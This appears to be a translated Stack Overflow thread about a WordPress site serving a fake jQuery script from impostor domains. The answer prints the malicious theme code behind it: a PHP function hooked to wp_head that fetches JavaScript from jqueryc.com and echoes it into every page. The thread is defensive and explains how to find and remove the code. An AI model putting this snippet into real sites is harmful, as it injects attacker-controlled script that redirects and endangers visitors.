我的网站被黑了,我一辈子都找不到它被注入(inject)的地方。我已采取必要的预防措施以确保它不再发生,并且我正在从备份中将我的网站恢复到较早的时间,但我想知道在哪里可以找到它,以防我托管的另一个网站发生这种情况。
这是恶意脚本:http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js
这是网站:(现已删除)
我到处都检查过,但没有成功。
如有任何帮助,我们将不胜感激。
谢谢。
** 对于那些给我投反对票的人,我做了很多研究,试图在过去的 4 小时内自己解决这个问题,我的腿上有一个 11 个月大的 child 。我只发布了这个问题作为最后的手段,因为我自己没有成功地做到这一点。由于我过去从这里的人那里得到过很大的帮助,所以我认为问问也无妨。
最佳答案
写下所有评论作为答案,因为这里有很好的信息来对抗漏洞利用。
问题
在一个 Wordpress 驱动的站点的源代码中发现了一个带有伪装成 jQuery CDN 的 URL 的脚本。听起来 jquerys.com 和 jqueryc.com 都被用作冒名顶替域名。
恶意代码很简单;它随机重定向到另一个站点并设置一个 cookie 以防止立即重定向(每天一次)。由于它不常见,因此在开发网站时可能永远不会看到它,或者忽略它。
可能的原因
- URL 输入错误
- 受感染的服务器
- 恶意主题
- 恶意插件
决议
开始于:http://codex.wordpress.org/FAQ_My_site_was_hacked
OP 在主题中找到这段代码:
// !!! Suspect Code - Do not use for any purpose !!!
//Jquery Function
if (!function_exists('insert_jquery_theme')){
function insert_jquery_theme(){
if (function_exists('curl_init')){
$url="jqueryc.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);
curl_close($ch);
echo $data;
}
}
add_action('wp_head', 'insert_jquery_theme');
}
查看源码,其实有两处引用了jQuery;一种是合法的,另一种不是。删除上述代码片段可解决问题。
确定恶意代码的来源(例如主题、插件或受感染的服务器)仍然很重要。如果不检查备份是否存在恶意代码,则不应恢复备份。
相关链接
关于javascript - Jquery 的恶意软件脚本,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/11786030/